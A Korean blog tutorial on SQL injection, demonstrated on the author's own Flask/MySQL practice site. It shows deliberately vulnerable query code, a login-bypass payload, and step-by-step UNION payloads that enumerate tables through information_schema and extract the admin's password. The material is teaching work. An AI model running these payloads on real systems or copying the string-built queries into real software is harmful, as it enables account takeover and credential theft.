sql-injection 기본 개념과 예제 실습

개인적으로 정보보안 분야를 처음 접하게된 계기이자,

지금도 web 해킹 하면 가장 먼저 떠오르는 오늘의 주인공

 

바로 sql injection 입니다.

 

 

벌써부터 낯설지만 코딩을 접하기만 해봐도 쉽게 이해할 수 있습니다.

 

지금부터의 모든 과정은 제가 직접 만든 웹에서 테스트 하였습니다.

허가되지 않은 타 사이트에서 문제시, 책임은 본인에게 있음을 꼭 알아야 합니다.

img_1 test page; main

 

제가 연습을 위해 만든 웹 페이지 입니다.

html, css, 약간의 js로 프런트를 그리고 flask와 mysql로 백엔드를 구연하였습니다.

 

 

다들 SQL에 대해서 들어보셨나요?

SQL은 데이터베이스의 데이터를 관리하기 위해 만들어진 프로그래밍 언어입니다.

 

그렇다면 sql injection 기법은 sql구문을 삽입하여 데이터베이스에 접근하는 공격 기법임을 유추해 볼 수 있겠네요.

 

대표적인 예시로 한번 보겠습니다.

 

img_2 test page; login

 

평범한 로그인 페이지 입니다.

제가 미리 등록해둔 계정정보는 다음과 같습니다.

name	email	password
guest1	guest1@gmail.com	1234
admin	admin@gamil.com	admin1234
1234	1234	1234

 

guest1 계정으로 로그인을 해볼까요

 

img_3 guest1 login; normal

 

순조롭게 로그인이 됩니다.

 

 

여기서, 다시 로그인 화면으로 돌아가서 다음 값을 넣어보겠습니다.

email	password
guest1@gmail.com	1' or '1'='1

img_4 guest1 login; abnormal

 

마찬가지로 로그인이 성공합니다.

우리가 방금 넣었던 1' or '1'='1에 무슨 비밀이 있을까요?

 

 

페이지의 코드를 살펴보며 차근차근 알아가 봅시다.

 

sql = "SELECT * FROM users WHERE email='%s' AND password='%s';" % (Email, Password)
db_class = dbModule.Database()
account = db_class.executeAll(sql)
            
if account:
    for row in account[0]:
        session[row] = account[0][row]
                    
    flash("어서오세요 %s님." % session['name'])
    return redirect("/")
            
else:
    flash("이메일과 비밀번호를 확인하세요.")
    return redirect('/login')

 

첫 문장을 보면, SQL 구문이 나와있습니다.

 SELECT * FROM users WHERE email='%s' AND password='%s'; 

 

그리고, 각각 사용자가 입력한 email과 password값을 넣어 DB에 보냅니다.

위 쿼리에 관해 간단한 설명을 하기 위해 쉽게 풀어 보겠습니다.

 

내보내라(SELECT) users란 테이블에서(FROM users) email이 ~이고, password가 ~인 데이터(WHERE ~)의 모든것을(*)

 

 

 

 

 

여기서 가장 처음과 같이 정상적인 로그인 시 쿼리문은 다음과 같이 보내집니다.

 SELECT * FROM users WHERE email='guest1@gmail.com' AND password='1234'; 

 

WHERE 뒤에 오는 조건문이 이해가 가시나요?

AND로 묶여있기에, 둘 중 하나라도 거짓이라면 조건이 거짓이 됩니다.

 

 

 

 

 

그렇다면, 우리가 두 번째로 입력했던 값으로 보낸다면 어떻게 될까요?

 SELECT * FROM users WHERE email='guest1@gmail.com' AND password='1' or '1'='1'; 

and로 email과 password값이 묶이고, 그 뒤로 or 이 오게 됩니다.

 

 

(email='guest1@gmail.com' AND password='1') or '1'='1'

쉽게 본다면 위와 같습니다. 연산시 and가 or 보다 우선순위이기 때문이죠.

그말은즉, 파란바탕 부분이 틀리더라도, or 뒤의 식이 참이라면 전체적인 조건이 참이 된다는 소리입니다. 

 

 

 

 

핵심은 single quote ' 에 있습니다.

single quote를 통해 틀을 벗어남 으로서, sql 구문을 사용자가 직접 조작할 수 있게됩니다.

사용자가 손쉽게 db에 접근할 수 있다면 정말 큰 문제가 될 수 있겠죠?

구체적으로 db에 있는 다른 사용자의 값을 유출할 수도, 심지어 조작할 수도 있습니다.

 

위 상황을 자세히 살펴보며, 이번 기회에 sql injection 기법을 확실히 이해해 봅시다.

 

 

 

db속 데이터를 유출하는 상황입니다.

환경은 같은 웹 페이지 속 게시판 페이지를 이용하겠습니다.

 

img_5 board page

 

 

제가 임의로 작성해놓은 글들을 제외하면, 평범한 게시판 입니다.

이중 하나를 클릭하여 들어가봅시다.

 

 

img_6 article page

 

 

제목, 본문, 작성자 그리고 작성시각이 나옵니다.

위 url을 보면, get으로 id라는 값을 전달함을 볼 수 있습니다.

이해가 빠르신 분들은 아시겠지만, id는 해당 게시글의 id로 해당 값에따라 보여지는 게시글이 달라집니다.

 

img_7 article in database

 

 

바로 이 부분을 공격하여 우리가 원하는 정보를 찾아내 볼것입니다.

 

 

 

시작하기에 앞서 먼저 알아야 할 SQL 문법과 mysql의 구조가 있습니다.

우선 UNION 구문입니다.

 

UNION은 쉽게말해 여러 값을 합치는 기능입니다.

주의할 점은 컬럼의 수가 일치해야 한다는 점입니다.

아래 사진속 예시를 보면, 컬럼 수가 다른 두 그룹을 묶으려 하자 오류가 발생하는 것을 볼 수 있습니다.

img_8 about union

 

 

다음은 group_concat 함수입니다.

 

먼저 concat 함수는 여러 문자열을 합쳐주는 함수입니다.

img_9 concat function

 

 

group_concat은 여러 결과를 합치는(쉽게 생각하면 select 의 결과를 합치는) 함수입니다.

img_10 group concat

 

 

 

다음으로 알아야할 것은 mysql의 information_schema입니다.

information_schema는 mysql 서버내 존재하는 db의 메타정보(테이블, 컬럼, 인덱스등의 스키마 정보)를 모아둔 db입니다.

읽기 전용이며 실재하는 테이블이 아닌, 조회 시 실시간으로 값을 가져옵니다.

이때문에 큰값을 가져올 경우 시간이 오래 걸릴 수 있습니다.

 

 

 

 

information_schema속 테이블의 종류는 다음과 같은데, 그중 우리가 봐야할 것은 TABLES와 COLUMNS입니다.

COLUMNS	ENGINES	TABLES	SCHEMATA	...
모든 스키마의 컬럼	사용되는 엔진	모든 테이블 정보	스키마 확인	...

 

 

 

 

 

 

테이블과 컬럼명을 모를 때 유용하게 사용 가능하며 순서는 보통 다음과 같이 사용합니다.

테이블명 → 컬럼명 → 해당 데이터

 

 

 SELECT table_name FROM information_schema.tables; 

information_schema를 이용하여 table이름을 찾아줍니다.

 

 SELECT column_name FROM information_schema.columns WHERE table_name='~~~'; 

기존에 알아냈던 table 이름을 마지막에 조건으로 걸어줍니다.

 

 SELECT col1, col2, col3 FROM ~; 

최종적으로 알아낸 table과 column명을 이용하여 데이터를 확인합니다.

 

 

 

 

 

 

 

준비는 이쯤 하고 다시 위 게시글 페이지로 돌아가서, 해당 페이지를 불러오는 코드는 다음과 같습니다.

@app.route("/article", methods=['GET'])
def article():
    article_id = request.args.get('id')
    db_class = dbModule.Database()
    
    sql = "SELECT * FROM writes WHERE id=%s;" % article_id
    article = db_class.executeAll(sql)[0]
    
    if (session['name'] == article['writer']):
        is_writer = True
    else:
        is_writer = False
    
    return render_template("article.html", article=article, is_writer=is_writer)

 

sql 쿼리를 살펴보면, id값을 기준으로 데이터를 불러옴을 알 수 있습니다.

 SELECT * FROM writes WHERE id='%s'; 

 

 

여기서 union을 이용하여 다른 값들을 불러올 수 있겠죠?

현재 아무런 테이블명, 컬럼명을 모른다는 가정하에 차근차근 찾아봅시다.

 

 

우선, union을 해주기 위해선 컬럼 수를 맞춰주어야 합니다.

get 파라미터 id 값에 아래와 같이 넣어보면서 개수를 찾아줍니다.

 

 -1 union select 1 

 -1 union select 1,1 

 -1 union select 1,1,1 

 ... 

 

 

계속 하다보면 5개의 컬럼이 있음을 확인할 수 있습니다.

img_11 error / success page

 

 

 

 

 

공간이 넓은 본문을 활용하여 information_schema를 뒤져봅시다. 다음 쿼리를 사용하였습니다.

 -1 union select 1,1,(select group_concat(table_name) from information_schema.tables),1,1 

 

img_12 table names

 

 

 

 

가장 마지막 부분의 users와 writes 테이블을 살벼봅시다.

 

 -1 union select 1,1,(select group_concat(column_name) from information_schema.columns where table_name='users'),1,1 

 -1 union select 1,1,(select group_concat(column_name) from information_schema.columns where table_name='writes'),1,1 

 

 

img_12 column names

 

 

더욱 흥미로워 보이는 users 테이블을 보겠습니다.

테이블 명과 컬럼명을 찾아냈다면, 해당 정보를 보는 것은 식은죽 먹기일겁니다.

admin 계정의 정보를 한번 추출해봅시다.

 

 -1 union select 1,1,(select concat(email, ', ', password) from users where name='admin'),1,1 

img_13 admin information

 

성공적으로 admin계정의 정보를 알 수 있습니다.

 

 

 

 

 

지금까지 잘 따라오셨다면 sql injection에 대해 많은것을 알게된 것입니다.

하지만 세월이 흐르며 수많은 방식들이 생겨났고, 그 양은 방대합니다.

 

하나씩 차근차근 내것으로 만들어 나가다 보면, 상황을 헤쳐나가는 길이 보일 것이고

이를 위해선 꾸준한 관심이 필요합니다.